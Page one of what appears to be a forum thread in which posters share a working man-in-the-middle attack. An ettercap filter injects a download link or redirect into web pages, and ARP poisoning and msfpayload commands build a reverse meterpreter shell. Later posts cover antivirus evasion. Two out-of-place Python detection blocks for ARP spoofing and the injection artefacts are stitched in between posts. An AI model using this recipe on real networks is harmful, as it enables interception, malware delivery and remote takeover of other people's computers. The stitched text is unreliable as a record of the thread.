Page 1 of 2 (Results 1 to 10 of 19)

Thread: ettercap filter html injection meterpeter.exe


  1. #1 BigMac (Senior Member, joined Jan 2008, 213 posts)

    ettercap filter html injection meterpeter.exe

    Take a look at the filter, look at what is being replaced... it's sort of HTML injection on the fly.
    If anyone wants to see a quick video I can post one to give you a better idea.

    What I did was create a reverse meterpreter executable, then hosted it on a server and did
    some ARP poisoning with some HTML injection; you could use this to trick people into
    downloading the .exe and get yourself a shell.

    This is just a proof of concept and I take no responsibility.


    html.filter
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Nothing!");
        }
    }

    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, "<title>")) {
            replace("</title>", "</title><form action=\"http://192.168.1.6/meterpeter.exe\" method=\"link\"><img src=\"http://192.168.1.6/alert.gif\"><INPUT TYPE=submit value=\"DOWNLOAD meterpeter.exe\"></form><html><body><h10>just some instructions</h10></body></html>");
            msg("html injected");
        }
    }
    I think this is the working filter.


    -create the meterpeter.exe-
    (open msfconsole)
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=100 X > meterpeter.exe
    Now place the executable into your Apache root directory.

    -set up your listener-
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.6
    set LPORT 100

    -execute ettercap-
    etterfilter html.filter -o html.ef
    ettercap -T -q -F html.ef -M ARP // //

    Now wait for someone on the network to download and execute meterpeter.exe and you will have a reverse shell.

    Let me know what you think
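The ettercap invocation in this post (-M ARP // //) only works because hosts on the LAN accept unsolicited ARP replies that rebind the gateway's and the victim's IP addresses to the attacker's MAC. As an added defensive illustration (not code from the thread or from ettercap), the following Python runs two checks a host agent or LAN sensor can apply to a log of ARP replies: an IP whose MAC changes mid-capture, and a single MAC that starts answering for several IPs at once. The capture, every address in it, and the function names detect_ip_rebinding / detect_multi_ip_macs are my own constructed assumptions.

```python
"""
Two ARP-poisoning checks over a constructed ARP-reply log.

A host or sensor that records ARP replies can spot the rebinding that
bidirectional ARP poisoning needs: an IP whose MAC changes, and one MAC that
suddenly claims several IPs (gateway and victim). All values are made up.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple


class ArpReply(NamedTuple):
    ts: float        # seconds since capture start (constructed)
    sender_ip: str   # IP the reply claims to speak for
    sender_mac: str  # MAC asserted for that IP


# Constructed capture: normal traffic, then a poisoning burst from MAC cc:...:06
SAMPLE_REPLIES: List[ArpReply] = [
    ArpReply(0.0, "192.168.1.1", "aa:aa:aa:aa:aa:01"),    # real gateway
    ArpReply(1.0, "192.168.1.20", "bb:bb:bb:bb:bb:20"),   # real client
    ArpReply(2.0, "192.168.1.6", "cc:cc:cc:cc:cc:06"),    # poisoning host's own IP
    ArpReply(5.0, "192.168.1.1", "cc:cc:cc:cc:cc:06"),    # gateway IP rebound
    ArpReply(5.1, "192.168.1.20", "cc:cc:cc:cc:cc:06"),   # client IP rebound
    ArpReply(6.0, "192.168.1.30", "dd:dd:dd:dd:dd:30"),   # unrelated host
]


def detect_ip_rebinding(replies):
    """Return (ip, old_mac, new_mac, ts) for every IP whose MAC changes.

    A legitimate LAN rarely rebinds an IP to a new MAC within a short capture;
    DHCP churn or a replaced NIC can do it, so treat hits as leads, not proof.
    """
    seen: Dict[str, str] = {}
    alerts = []
    for r in replies:
        prev = seen.get(r.sender_ip)
        if prev is not None and prev != r.sender_mac:
            alerts.append((r.sender_ip, prev, r.sender_mac, r.ts))
        seen[r.sender_ip] = r.sender_mac
    return alerts


def detect_multi_ip_macs(replies, threshold=2):
    """Return {mac: sorted IPs} for MACs claiming at least `threshold` IPs.

    Bidirectional ARP poisoning makes one MAC answer for both the gateway and
    the victim. Routers and virtualisation hosts can legitimately answer for
    several IPs too, so whitelist known multi-homed MACs in practice.
    """
    claims = defaultdict(set)
    for r in replies:
        claims[r.sender_mac].add(r.sender_ip)
    return {mac: sorted(ips) for mac, ips in claims.items() if len(ips) >= threshold}


if __name__ == "__main__":
    for ip, old, new, ts in detect_ip_rebinding(SAMPLE_REPLIES):
        print(f"t={ts:5.1f} ARP rebinding: {ip} moved {old} -> {new}")
    for mac, ips in detect_multi_ip_macs(SAMPLE_REPLIES).items():
        print(f"MAC {mac} claims {len(ips)} IPs: {', '.join(ips)}")
```

On the constructed capture the first check reports both rebindings at t=5.0 and t=5.1, and the second reports the single MAC that now claims the gateway, the client and its own address. Static ARP entries for the gateway, or a switch with dynamic ARP inspection, remove the precondition entirely; the checks above are for networks where that is not available.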

  2. #2 hawaii67 (Member, joined Feb 2006, 318 posts)

    Quote: "Let me know what you think"
    Nice, but you need a fair amount of social engineering.
    Don't eat yellow snow :rolleyes:

  3. #3 BigMac (Senior Member, joined Jan 2008, 213 posts)

    If I had skill in HTML, Java or PHP... the webpage would sell itself.
    Code:
    <form action="http://192.168.1.6/meterpeter.exe" method="link">
    <img src="http://192.168.1.6/alert.gif">
    <INPUT TYPE=submit value="DOWNLOAD meterpeter.exe">
    </form><html><body><h10>just some instructions</h10></body></html>
    Maybe give me some suggestions.

  4. #4 hawaii67 (Member, joined Feb 2006, 318 posts)

    Don't get me wrong, the idea is really nice. Unless you can exploit some vulnerability, you almost always depend on the user to click and/or download something. Evilgrade is an exception to this.
    Don't eat yellow snow :rolleyes:

  5. #5 BigMac (Senior Member, joined Jan 2008, 213 posts)

    http://www.infobyte.com.ar/demo/evilgrade.htm
    Wow, this looks cool... I was not sure what Evilgrade was.

  6. #6 (Just burned his ISO, joined Nov 2008, 14 posts)

    Hey BigMac

    I recently posted about this; it's in the newbie area under "Vista remote shell with phish". I have since perfected it... given a little time to work with it, but I have a filter (DNS wasn't working too well) that will redirect all traffic.

    Thanks go out to hawaii67 for posting this filter some time ago; I'll try to find that post and put it in here later.

    Try this as your filter: if the target machine already has a web page open, it will give an error "404"; after they attempt to refresh (or open another page) it will redirect to your HTTPD server.

    #FILTER START#

    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Rubbish!");
            msg("changed Accept-Encoding!\n");
        }
    }
    if (ip.proto == TCP && tcp.src == 80) {
        replace("<BODY", "&#x000D<BODY onload=\"javascript:document.location.href='insert your site here'\"><XSS a=");
        replace("<body", "&#x000D<body onload=\"javascript:document.location.href='insert your site here'\"><XSS a=");
        msg("Filter Ran.\n");
    }

    #FILTER END#

    --EDIT--
    This post doesn't allow script spacing, but I'm sure you'll get it. I also have the web pages built and yes, they do SELL THEMSELVES. If anyone's interested send me a message or an email, and I'll send you a copy of what I have thus far. (I'm not sure if I can put them on here?)
    And the original script was posted in a Backtrack 2.0 post entitled "ettercap filters", page 2 of the post, if anyone wants to read more about it.
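Both filters in this thread, the one in post #1 and the one above, leave the same kind of fingerprints in plaintext HTTP. On the request side they overwrite Accept-Encoding in place with a name no browser sends (Accept-Nothing!, Accept-Rubbish!) so the server answers uncompressed; on the response side they splice markup in, either a form pointing at an .exe plus a second <html> root right after </title> (post #1), or a <body onload=...> redirect followed by a stray <XSS a= wrapper (post #6). As an added defensive illustration, not code from the thread, the Python below flags exactly those artefacts in constructed sample traffic; a proxy, IDS or browser extension that sees the plaintext can apply the same checks. The sample request and page, the host example.test, and the function names are my own assumptions; the host and file name in the injected form are the values the thread itself uses.

```python
"""
Two checks for the artefacts the ettercap filters in posts #1 and #6 leave in
plaintext HTTP, run over constructed sample traffic. Added illustration only;
none of this is code from the thread.
"""
import re
from typing import Dict, List, Tuple

# Accept-* request headers a real browser sends; any other header whose name
# starts with "Accept" (e.g. "Accept-Nothing!", "Accept-Rubbish!") is a rewrite artefact.
STANDARD_ACCEPT_HEADERS = {
    "accept", "accept-encoding", "accept-language", "accept-charset", "accept-datetime",
}

# Markup fingerprints of the two filters (the labels are my own).
INJECTION_PATTERNS = {
    # post #1: a form whose action is an .exe, spliced directly after </title>
    "form-to-exe-after-title": re.compile(
        r'</title>\s*<form[^>]*action="[^"]*\.exe"', re.I),
    # post #1: the filter appends a second <html> root inside the page
    "duplicate-html-root": re.compile(r"<html\b.*<html\b", re.I | re.S),
    # post #6: <body onload=...> that rewrites document.location
    "onload-location-redirect": re.compile(
        r'<body[^>]*onload="javascript:document\.location\.href=', re.I),
    # post #6: the "<XSS a=" wrapper used to swallow the rest of the original tag
    "stray-xss-tag": re.compile(r"<xss\s", re.I),
}


def parse_request_headers(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (request line, {lower-name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def suspicious_accept_headers(raw_request: str) -> List[str]:
    """Return Accept-* header names that no standard client would send.

    The filters overwrite 'Accept-Encoding' in place, so the header count is
    unchanged, but a never-standard name appears and Accept-Encoding vanishes.
    """
    _, headers = parse_request_headers(raw_request)
    return sorted(n for n in headers
                  if n.startswith("accept") and n not in STANDARD_ACCEPT_HEADERS)


def injected_markup_findings(body: str) -> List[str]:
    """Return the labels of every injection fingerprint found in an HTML body."""
    return sorted(label for label, pat in INJECTION_PATTERNS.items() if pat.search(body))


# --- constructed samples -----------------------------------------------------
CLEAN_REQUEST = ("GET / HTTP/1.1\r\nHost: example.test\r\n"
                 "Accept: text/html\r\nAccept-Encoding: gzip, deflate\r\n"
                 "Accept-Language: en\r\n\r\n")
TAMPERED_REQUEST = CLEAN_REQUEST.replace("Accept-Encoding", "Accept-Rubbish!")

CLEAN_PAGE = ('<html><head><title>Hi</title></head>'
              '<body class="a"><p>hello</p></body></html>')
# what the post #1 filter turns CLEAN_PAGE into (host/file are the thread's values)
INJECTED_PAGE_1 = CLEAN_PAGE.replace(
    "</title>",
    '</title><form action="http://192.168.1.6/meterpeter.exe" method="link">'
    '<INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form>'
    "<html><body><h10>just some instructions</h10></body></html>")
# what the post #6 filter turns CLEAN_PAGE into
INJECTED_PAGE_6 = CLEAN_PAGE.replace(
    "<body",
    "&#x000D<body onload=\"javascript:document.location.href='http://192.168.1.6/'\"><XSS a=")


if __name__ == "__main__":
    for label, req in (("clean", CLEAN_REQUEST), ("tampered", TAMPERED_REQUEST)):
        print(f"{label} request: odd Accept headers = {suspicious_accept_headers(req)}")
    for label, page in (("clean", CLEAN_PAGE), ("post #1", INJECTED_PAGE_1),
                        ("post #6", INJECTED_PAGE_6)):
        print(f"{label} page: {injected_markup_findings(page)}")
```

The header check is the more robust of the two, since every variant of this filter family has to defeat compression somehow, while the markup patterns are specific to the two replacement strings shown in the thread. None of it applies once the site is served over HTTPS, which removes the on-the-wire rewrite point altogether.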

  7. #7 BigMac (Senior Member, joined Jan 2008, 213 posts)

    Code:
    <P ALIGN=center><IFRAME SRC="http://server" WIDTH=300 HEIGHT=100></IFRAME></P>

    This iframe has potential.

    And check out Irongeek's latest videos... bypass anti-virus, fully undetected...

  8. #8 (Just burned his ISO, joined Nov 2008, 14 posts)

    I'll look into it

    I watched the video. The problem with the normal way we both had going is that Vista's IDS picks it up (note that XP SP3 does not... it just runs); this may solve that problem. The normal way with meterpreter/reverse_http does not set off IDS, however it really doesn't work. I will play around with the code for the filter and with my setup and see if it gets past IDS. My money says it will. But I'll let you know.
    Also I think you will find that Windows users have come to expect the OS asking them "do you want to?, do you really?, are you sure?, that's not such a good idea!, DO YOU REALLY!!!?".
    lol, but again, give me a day or two to test some things and I'll get back to you.

  9. #9 BigMac (Senior Member, joined Jan 2008, 213 posts)

    Have you tested this msfencode? http://metasploit.com/dev/trac/wiki/...ingMeterpreter

    It's not working for me... I use the correct commands and check the ls -alrt and then I execute this payload on one of my computers, but the exploit multi handler does not get a connection? I'm stumped.

  10. #10 (Just burned his ISO, joined Nov 2008, 14 posts)

    No, that one doesn't work for me.

    I have tried it; I could not get it to work either. The only one that gives me a connection is the original script; there must be something in the EXE payload that's not running. I'm still playing with it.
    The next step for me is to start troubleshooting by running a few pre-made exe files and see if ANY connect back. If not, I will see if I can't find out why. I think it has something to do with the way the payload is initiated. I'll start troubleshooting tomorrow.

